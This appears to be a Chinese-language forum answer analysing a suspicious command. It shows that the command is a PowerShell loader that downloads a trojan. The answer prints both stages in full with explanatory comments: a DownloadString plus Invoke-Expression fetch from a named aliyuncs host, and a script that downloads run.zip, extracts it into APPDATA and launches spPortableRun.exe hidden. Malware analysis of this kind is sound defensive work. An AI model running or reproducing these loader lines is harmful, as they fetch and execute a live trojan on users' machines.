这个命令提示符输入有什么作用？

为了帮助您了解该命令的作用，并可能帮助未来遇到类似问题的读者，这确实是在下载并执行木马。

通过简单的步骤来确定这一点，首先使用

Invoke-RestMethod

Invoke-RestMethod https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt

您将看到内容是一个PowerShell脚本。当您在脚本顶部看到可疑的

run.zip

.zip

添加注释以了解代码的作用：

# defines download file
$zxty = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip'
# defines destination file for the zip
$qbrw = "$env:APPDATA\file_azlm5.zip"
# defines destination folder for the zip
$lpmk = "$env:APPDATA\Install_4278"
# defines destination path
$vkdy = Join-Path $lpmk 'spPortableRun.exe'

# if the destination folder doesnt exist
if (!(Test-Path $lpmk)) {
    # creates it
    New-Item -Path $lpmk -ItemType Directory
}

try {
    # tries to download `run.zip` to destination file `file_azlm5.zip`
    $ghwd = New-Object System.Net.WebClient
    $ghwd.DownloadFile($zxty, $qbrw)
}
catch {
    exit
}

try {
    Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
    # extract the downloaded zip to destination folder `Install_4278`
    [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
    # and delete the zip file
    Remove-Item $qbrw -Force
}
catch {
    exit
}

try {
    # starts the trojan extracted from the zip file
    # (should've been `spPortableRun.exe` in `Install_4278` folder)
    Start-Process -FilePath $vkdy -WindowStyle Hidden
}
catch {
    exit
}

并用注释来总结，您将要执行的

-Command

# defines content URL
$rQd = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'
# creates a WebClient object
$pLs = New-Object System.Net.WebClient
# download the string content
# (this is pretty much like using `Invoke-RestMethod`)
$sLf = $pLs.DownloadString($rQd)
# invoke expression here invokes the PowerShell script
# embedded in the string content 
Invoke-Expression $sLf